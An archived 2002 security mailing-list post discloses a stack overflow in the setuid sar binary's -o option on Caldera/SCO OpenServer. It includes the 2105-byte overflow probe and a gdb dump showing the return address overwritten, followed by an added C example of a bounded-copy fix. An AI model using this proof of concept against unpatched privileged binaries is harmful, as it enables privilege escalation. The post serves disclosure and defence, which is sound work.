Vulnerability Development mailing list archives

Sar -o exploitation process info.
From: KF <dotslash () snosoft com>
Date: Thu, 09 May 2002 05:29:43 -0400

Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brock Tellier or k2 probably, I can't remember). The -f overflow was fixed, but the -o option (which I have seen in private security advisories floating around) also had an overflow, but I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit, but here are the details for those of you that are interested.
SecurityFocus BID: http://online.securityfocus.com/advisories/4089
Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17

Exploit details:

Starting program: //home/kevin//./sar -o  `perl -e 'print "A" x 2104'`
//home/kevin//./sar: Cannot create file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l

Program exited with code 01.

Try again with one more char.

(gdb) r -o  `perl -e 'print "A" x 2105'`
Starting program: //home/kevin//./sar -o  `perl -e 'print "A" x 2105'`

Program received signal SIGSEGV, Segmentation fault.
0x80021c2d in getenv ()
(gdb) bt
#0  0x80021c2d in getenv ()
#1  0x8001f2da in _tz_info ()
#2  0x8004e5c2 in tzset ()
#3  0x8004e4ba in _localtime_r ()
#4  0x8001db5f in localtime ()
#5  0x804a124 in memset ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) frame 6
#6  0x41414141 in ?? ()
(gdb) i r
eax            0x8001db20       -2147362016
ecx            0x54     84
edx            0x804765c        134510172
ebx            0x0      0
esp            0x80463d4        0x80463d4
ebp            0x41414141       0x41414141
esi            0x804764c        134510156
edi            0x0      0
eip            0x41414141       0x41414141
ps             0x10206  66054
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x0      0


-KF
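The register dump above shows both ebp and eip holding 0x41414141, i.e. the saved frame pointer and return address on the stack were overwritten by the -o argument, with 2104 bytes surviving and 2105 faulting. The following is an added example, not sar's source or Caldera's fix: it contrasts the unbounded-copy pattern that produces this kind of crash with a length-checked copy that rejects an overlong file name before anything is written. The buffer size OUTFILE_MAX, the function names and the "sar: output file name too long" message are assumptions chosen for illustration; the real sar buffer size is not on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size buffer for the -o file name. The crash boundary in
   the post (2104 bytes fine, 2105 faults) points at a fixed stack buffer,
   but the real size in sar is not known from the page. */
#define OUTFILE_MAX 2104

/* The unsafe pattern, shown for contrast only and never called:
 *
 *   static void unsafe_set_outfile(const char *arg) {
 *       char outfile[OUTFILE_MAX];
 *       strcpy(outfile, arg);   // writes past outfile when arg is too long,
 *   }                           // clobbering saved ebp and the return address
 */

/* Bounded copy: returns 0 and fills dst when src (plus its NUL) fits in
   dstsz bytes, otherwise leaves dst as an empty string and returns -1. */
int copy_outfile(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {           /* no room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);    /* copies exactly n bytes plus the NUL */
    return 0;
}

/* Handler for "-o <file>": returns 0 if the name was accepted, 1 if it was
   rejected as too long. A real program would open outfile after the check. */
int handle_o_option(const char *arg)
{
    char outfile[OUTFILE_MAX];

    if (copy_outfile(outfile, sizeof outfile, arg) != 0) {
        fprintf(stderr, "sar: output file name too long (max %zu bytes)\n",
                sizeof outfile - 1);
        return 1;
    }
    return 0;
}

/* Helper that reproduces the post's probe: a file name of `len` 'A' bytes
   (constructed here, not read from anywhere) fed to the -o handler. */
int result_for_name_length(size_t len)
{
    char *name = malloc(len + 1);
    int rc;

    if (name == NULL)
        return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    rc = handle_o_option(name);
    free(name);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc == 3 && strcmp(argv[1], "-o") == 0)
        return handle_o_option(argv[2]);
    fprintf(stderr, "usage: %s -o <file>\n", argv[0]);
    return 2;
}
```

With OUTFILE_MAX set to 2104, a 2103-byte name is the longest that fits with its terminator; 2104- and 2105-byte names are refused instead of running off the end of the buffer. The check lives in copy_outfile, so the same function can guard every place a user-supplied string is copied into fixed storage.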